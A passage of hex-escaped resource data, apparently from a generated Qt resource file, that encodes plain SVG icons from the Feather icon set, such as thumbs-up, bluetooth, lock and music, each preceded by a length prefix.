\x33\x2e\x30\x37\x20\x31\x39\x2e\x35\x20\x31\x39\x2e\x35\x20\x30\
\x20\x30\x20\x31\x2d\x36\x2d\x36\x20\x31\x39\x2e\x37\x39\x20\x31\
\x39\x2e\x37\x39\x20\x30\x20\x30\x20\x31\x2d\x33\x2e\x30\x37\x2d\
\x38\x2e\x36\x37\x41\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x34\
\x2e\x31\x31\x20\x32\x68\x33\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x31\x20\x32\x20\x31\x2e\x37\x32\x20\x31\x32\x2e\x38\x34\x20\x31\
\x32\x2e\x38\x34\x20\x30\x20\x30\x20\x30\x20\x2e\x37\x20\x32\x2e\
\x38\x31\x20\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x2e\x34\x35\
\x20\x32\x2e\x31\x31\x4c\x38\x2e\x30\x39\x20\x39\x2e\x39\x31\x61\
\x31\x36\x20\x31\x36\x20\x30\x20\x30\x20\x30\x20\x36\x20\x36\x6c\
\x31\x2e\x32\x37\x2d\x31\x2e\x32\x37\x61\x32\x20\x32\x20\x30\x20\
\x30\x20\x31\x20\x32\x2e\x31\x31\x2d\x2e\x34\x35\x20\x31\x32\x2e\
\x38\x34\x20\x31\x32\x2e\x38\x34\x20\x30\x20\x30\x20\x30\x20\x32\
\x2e\x38\x31\x2e\x37\x41\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\
\x32\x32\x20\x31\x36\x2e\x39\x32\x7a\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x62\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x68\x75\x6d\x62\
\x73\x2d\x75\x70\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\
\x31\x34\x20\x39\x56\x35\x61\x33\x20\x33\x20\x30\x20\x30\x20\x30\
\x2d\x33\x2d\x33\x6c\x2d\x34\x20\x39\x76\x31\x31\x68\x31\x31\x2e\
\x32\x38\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\x32\x2d\x31\
\x2e\x37\x6c\x31\x2e\x33\x38\x2d\x39\x61\x32\x20\x32\x20\x30\x20\
\x30\x20\x30\x2d\x32\x2d\x32\x2e\x33\x7a\x4d\x37\x20\x32\x32\x48\
\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x2d\x32\x76\
\x2d\x37\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x2d\x32\
\x68\x33\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\
\x3e\
\x00\x00\x01\xa5\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6f\x6d\x6d\x61\
\x6e\x64\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x38\
\x20\x33\x61\x33\x20\x33\x20\x30\x20\x30\x20\x30\x2d\x33\x20\x33\
\x76\x31\x32\x61\x33\x20\x33\x20\x30\x20\x30\x20\x30\x20\x33\x20\
\x33\x20\x33\x20\x33\x20\x30\x20\x30\x20\x30\x20\x33\x2d\x33\x20\
\x33\x20\x33\x20\x30\x20\x30\x20\x30\x2d\x33\x2d\x33\x48\x36\x61\
\x33\x20\x33\x20\x30\x20\x30\x20\x30\x2d\x33\x20\x33\x20\x33\x20\
\x33\x20\x30\x20\x30\x20\x30\x20\x33\x20\x33\x20\x33\x20\x33\x20\
\x30\x20\x30\x20\x30\x20\x33\x2d\x33\x56\x36\x61\x33\x20\x33\x20\
\x30\x20\x30\x20\x30\x2d\x33\x2d\x33\x20\x33\x20\x33\x20\x30\x20\
\x30\x20\x30\x2d\x33\x20\x33\x20\x33\x20\x33\x20\x30\x20\x30\x20\
\x30\x20\x33\x20\x33\x68\x31\x32\x61\x33\x20\x33\x20\x30\x20\x30\
\x20\x30\x20\x33\x2d\x33\x20\x33\x20\x33\x20\x30\x20\x30\x20\x30\
\x2d\x33\x2d\x33\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x3d\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x72\x72\x6f\x77\
\x2d\x64\x6f\x77\x6e\x2d\x72\x69\x67\x68\x74\x22\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x37\x22\x20\x79\x31\x3d\x22\x37\x22\
\x20\x78\x32\x3d\x22\x31\x37\x22\x20\x79\x32\x3d\x22\x31\x37\x22\
\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\
\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x37\x20\x37\x20\x31\
\x37\x20\x31\x37\x20\x37\x20\x31\x37\x22\x3e\x3c\x2f\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x36\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x72\x72\x6f\x77\
\x2d\x75\x70\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\
\x32\x22\x20\x79\x31\x3d\x22\x31\x39\x22\x20\x78\x32\x3d\x22\x31\
\x32\x22\x20\x79\x32\x3d\x22\x35\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\
\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\
\x73\x3d\x22\x35\x20\x31\x32\x20\x31\x32\x20\x35\x20\x31\x39\x20\
\x31\x32\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x3a\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x72\x72\x6f\x77\
\x2d\x72\x69\x67\x68\x74\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x35\x22\x20\x79\x31\x3d\x22\x31\x32\x22\x20\x78\x32\x3d\
\x22\x31\x39\x22\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\
\x69\x6e\x74\x73\x3d\x22\x31\x32\x20\x35\x20\x31\x39\x20\x31\x32\
\x20\x31\x32\x20\x31\x39\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\
\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x2a\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x62\x6c\x75\x65\x74\
\x6f\x6f\x74\x68\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\
\x70\x6f\x69\x6e\x74\x73\x3d\x22\x36\x2e\x35\x20\x36\x2e\x35\x20\
\x31\x37\x2e\x35\x20\x31\x37\x2e\x35\x20\x31\x32\x20\x32\x33\x20\
\x31\x32\x20\x31\x20\x31\x37\x2e\x35\x20\x36\x2e\x35\x20\x36\x2e\
\x35\x20\x31\x37\x2e\x35\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\
\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x39\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6f\x72\x6e\x65\
\x72\x2d\x72\x69\x67\x68\x74\x2d\x75\x70\x22\x3e\x3c\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x30\
\x20\x39\x20\x31\x35\x20\x34\x20\x32\x30\x20\x39\x22\x3e\x3c\x2f\
\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\
\x3d\x22\x4d\x34\x20\x32\x30\x68\x37\x61\x34\x20\x34\x20\x30\x20\
\x30\x20\x30\x20\x34\x2d\x34\x56\x34\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x47\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x75\x73\x69\x63\
\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x39\x20\x31\x38\
\x56\x35\x6c\x31\x32\x2d\x32\x76\x31\x33\x22\x3e\x3c\x2f\x70\x61\
\x74\x68\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x36\
\x22\x20\x63\x79\x3d\x22\x31\x38\x22\x20\x72\x3d\x22\x33\x22\x3e\
\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x63\x69\x72\x63\x6c\x65\
\x20\x63\x78\x3d\x22\x31\x38\x22\x20\x63\x79\x3d\x22\x31\x36\x22\
\x20\x72\x3d\x22\x33\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\
\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x66\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x6f\x63\x6b\x65\
\x74\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x34\x20\x33\
\x68\x31\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x20\
\x32\x76\x36\x61\x31\x30\x20\x31\x30\x20\x30\x20\x30\x20\x31\x2d\
\x31\x30\x20\x31\x30\x41\x31\x30\x20\x31\x30\x20\x30\x20\x30\x20\
\x31\x20\x32\x20\x31\x31\x56\x35\x61\x32\x20\x32\x20\x30\x20\x30\
\x20\x31\x20\x32\x2d\x32\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\
\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\
\x3d\x22\x38\x20\x31\x30\x20\x31\x32\x20\x31\x34\x20\x31\x36\x20\
\x31\x30\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x69\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x66\x6f\x6c\x64\x65\
\x72\x2d\x6d\x69\x6e\x75\x73\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\
\x3d\x22\x4d\x32\x32\x20\x31\x39\x61\x32\x20\x32\x20\x30\x20\x30\
\x20\x31\x2d\x32\x20\x32\x48\x34\x61\x32\x20\x32\x20\x30\x20\x30\
\x20\x31\x2d\x32\x2d\x32\x56\x35\x61\x32\x20\x32\x20\x30\x20\x30\
\x20\x31\x20\x32\x2d\x32\x68\x35\x6c\x32\x20\x33\x68\x39\x61\x32\
\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x20\x32\x7a\x22\x3e\x3c\
\x2f\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\
\x39\x22\x20\x79\x31\x3d\x22\x31\x34\x22\x20\x78\x32\x3d\x22\x31\
\x35\x22\x20\x79\x32\x3d\x22\x31\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\
\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x41\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6c\x6f\x63\x6b\x22\
\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x33\x22\x20\x79\x3d\x22\
\x31\x31\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x38\x22\x20\x68\
\x65\x69\x67\x68\x74\x3d\x22\x31\x31\x22\x20\x72\x78\x3d\x22\x32\
\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\x63\x74\x3e\
\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x37\x20\x31\x31\x56\x37\
\x61\x35\x20\x35\x20\x30\x20\x30\x20\x31\x20\x31\x30\x20\x30\x76\
\x34\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\
\x00\x00\x01\x4b\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x72\x65\x6e\x64\
\x69\x6e\x67\x2d\x64\x6f\x77\x6e\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\
\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x32\x33\x20\x31\
\x38\x20\x31\x33\x2e\x35\x20\x38\x2e\x35\x20\x38\x2e\x35\x20\x31\
\x33\x2e\x35\x20\x31\x20\x36\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\
\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\
\x69\x6e\x74\x73\x3d\x22\x31\x37\x20\x31\x38\x20\x32\x33\x20\x31\
\x38\x20\x32\x33\x20\x31\x32\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\
\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x02\x8a\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
